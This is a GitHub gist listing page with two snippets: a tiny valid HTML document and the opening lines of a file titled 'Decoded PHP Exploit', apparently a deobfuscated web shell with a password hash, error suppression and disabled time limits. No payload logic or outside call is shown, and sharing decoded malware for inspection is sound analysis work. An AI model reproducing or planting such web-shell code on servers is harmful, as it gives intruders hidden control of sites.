Skip to content

Instantly share code, notes, and snippets.

@mkantor
mkantor / gist:3837424
Created October 5, 2012 00:55
A valid HTML document
<!doctype html>
<title>Believe it or not, this is a valid HTML document</title>
<br />
@mkantor
mkantor / decoded.php
Created September 14, 2012 02:06
Decoded PHP Exploit
<?php
$language='eng';$auth = 1;$authp = "259d9c27e4be1b3c1c1020eca89c90c1";
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "0.76";